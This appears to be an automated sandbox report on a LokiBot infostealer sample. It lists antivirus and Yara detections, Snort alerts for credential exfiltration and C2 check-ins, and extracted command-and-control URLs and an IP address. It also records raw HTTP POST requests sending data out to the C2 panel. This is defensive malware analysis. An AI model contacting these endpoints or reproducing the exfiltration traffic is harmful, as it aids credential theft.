Avira: detected

Antivirus detection for URL or domain

Source: http://kbfvzoboss.bid/alien/fre.php	URL Reputation: Label: malware
Source: http://alphastand.win/alien/fre.php	URL Reputation: Label: malware
Source: http://alphastand.trade/alien/fre.php	URL Reputation: Label: malware
Source: http://alphastand.top/alien/fre.php	URL Reputation: Label: malware

Found malware configuration

Source: 00000000.00000002.1654874181.0000000003520000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "https://tequilacofradiamx.com/minyhug/fxgsfhsdtytdjfudyjfjewrwsejyt/Panel/five/fre.php"]}

Multi AV Scanner detection for submitted file

Source: lqoUUYTMsL.exe

ReversingLabs: Detection: 79%

Machine Learning detection for sample

Source: lqoUUYTMsL.exe

Joe Sandbox ML: detected

Source: lqoUUYTMsL.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\lqoUUYTMsL.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Jump to behavior

Source: lqoUUYTMsL.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49730 -> 91.92.253.228:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49730 -> 91.92.253.228:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49730 -> 91.92.253.228:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49730 -> 91.92.253.228:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49730 -> 91.92.253.228:80
Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49731 -> 91.92.253.228:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49731 -> 91.92.253.228:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49731 -> 91.92.253.228:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49731 -> 91.92.253.228:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49731 -> 91.92.253.228:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49732 -> 91.92.253.228:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49732 -> 91.92.253.228:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49732 -> 91.92.253.228:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49732 -> 91.92.253.228:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49732 -> 91.92.253.228:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49733 -> 91.92.253.228:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49733 -> 91.92.253.228:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49733 -> 91.92.253.228:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49733 -> 91.92.253.228:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49733 -> 91.92.253.228:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor	URLs: https://tequilacofradiamx.com/minyhug/fxgsfhsdtytdjfudyjfjewrwsejyt/Panel/five/fre.php

Source: Joe Sandbox View

ASN Name: THEZONEBG THEZONEBG

Source: global traffic	HTTP traffic detected: POST /minyhug/fxgsfhsdtytdjfudyjfjewrwsejyt/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tequilacofradiamx.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D0B62332Content-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /minyhug/fxgsfhsdtytdjfudyjfjewrwsejyt/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tequilacofradiamx.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D0B62332Content-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /minyhug/fxgsfhsdtytdjfudyjfjewrwsejyt/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tequilacofradiamx.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D0B62332Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /minyhug/fxgsfhsdtytdjfudyjfjewrwsejyt/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tequilacofradiamx.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D0B62332Content-Length: 149Connection: close

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\lqoUUYTMsL.exe

Code function: 2_2_00404ED4 recv,

2_2_00404ED4

Source: unknown

DNS traffic detected: queries for: tequilacofradiamx.com

Source: unknown

HTTP traffic detected: POST /minyhug/fxgsfhsdtytdjfudyjfjewrwsejyt/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tequilacofradiamx.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D0B62332Content-Length: 176Connection: close

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 18 Apr 2024 21:01:57 GMTServer: Apache/2.2.15 (CentOS)Last-Modified: Wed, 17 Apr 2024 06:00:48 GMTETag: "6164b-587-616449379118c"Accept-Ranges: bytesContent-Length: 1415Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 30 70 78 3b 20 63 6f 6c 6f 72 3a 23 39 39 41 37 41 46 3b 20 6d 61 72 67 69 6e 3a 20 37 30 70 78 20 30 20 30 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 68 32 20 7b 63 6f 6c 6f 72 3a 20 23 44 45 36 43 35 44 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6d 61 72 67 69 6e 3a 20 2d 33 70 78 20 30 20 33 39 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 70 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 20 7d 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 76 69 73 69 74 65 64 20 7b 63 6f 6c
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 18 Apr 2024 21:01:58 GMTServer: Apache/2.2.15 (CentOS)Last-Modified: Wed, 17 Apr 2024 06:00:48 GMTETag: "6164b-587-616449379118c"Accept-Ranges: bytesContent-Length: 1415Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 30 70 78 3b 20 63 6f 6c 6f 72 3a 23 39 39 41 37 41 46 3b 20 6d 61 72 67 69 6e 3a 20 37 30 70 78 20 30 20 30 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 68 32 20 7b 63 6f 6c 6f 72 3a 20 23 44 45 36 43 35 44 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6d 61 72 67 69 6e 3a 20 2d 33 70 78 20 30 20 33 39 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 70 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 20 7d 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 76 69 73 69 74 65 64 20 7b 63 6f 6c
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 18 Apr 2024 21:01:58 GMTServer: Apache/2.2.15 (CentOS)Last-Modified: Wed, 17 Apr 2024 06:00:48 GMTETag: "6164b-587-616449379118c"Accept-Ranges: bytesContent-Length: 1415Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 30 70 78 3b 20 63 6f 6c 6f 72 3a 23 39 39 41 37 41 46 3b 20 6d 61 72 67 69 6e 3a 20 37 30 70 78 20 30 20 30 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 68 32 20 7b 63 6f 6c 6f 72 3a 20 23 44 45 36 43 35 44 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6d 61 72 67 69 6e 3a 20 2d 33 70 78 20 30 20 33 39 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 70 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 20 7d 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 76 69 73 69 74 65 64 20 7b 63 6f 6c
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 18 Apr 2024 21:01:59 GMTServer: Apache/2.2.15 (CentOS)Last-Modified: Wed, 17 Apr 2024 06:00:48 GMTETag: "6164b-587-616449379118c"Accept-Ranges: bytesContent-Length: 1415Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 30 70 78 3b 20 63 6f 6c 6f 72 3a 23 39 39 41 37 41 46 3b 20 6d 61 72 67 69 6e 3a 20 37 30 70 78 20 30 20 30 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 68 32 20 7b 63 6f 6c 6f 72 3a 20 23 44 45 36 43 35 44 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6d 61 72 67 69 6e 3a 20 2d 33 70 78 20 30 20 33 39 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 70 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 20 7d 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 76 69 73 69 74 65 64 20 7b 63 6f 6c

Source: lqoUUYTMsL.exe, 00000001.00000002.1680125185.0000000000F08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tequilacofradiamx.com/
Source: lqoUUYTMsL.exe, lqoUUYTMsL.exe, 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: lqoUUYTMsL.exe, 00000001.00000002.1680125185.0000000000F08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tequilacofradiamx.com/minyhug/fxgsfhsdtytdjfudyjfjewrwsejyt/Panel/five/fre.php

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.lqoUUYTMsL.exe.6a83510.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.lqoUUYTMsL.exe.6a83510.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.lqoUUYTMsL.exe.6a83510.4.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.lqoUUYTMsL.exe.6a83510.4.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.lqoUUYTMsL.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 2.2.lqoUUYTMsL.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 2.2.lqoUUYTMsL.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 2.2.lqoUUYTMsL.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.lqoUUYTMsL.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.lqoUUYTMsL.exe.6a83510.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.lqoUUYTMsL.exe.6a83510.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.lqoUUYTMsL.exe.6a83510.4.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.lqoUUYTMsL.exe.6a83510.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.lqoUUYTMsL.exe.6a83510.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 2.2.lqoUUYTMsL.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 2.2.lqoUUYTMsL.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 2.2.lqoUUYTMsL.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 2.2.lqoUUYTMsL.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.lqoUUYTMsL.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.1656396355.0000000006A83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1656396355.0000000006A83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1656396355.0000000006A83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.1654874181.00000000036A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
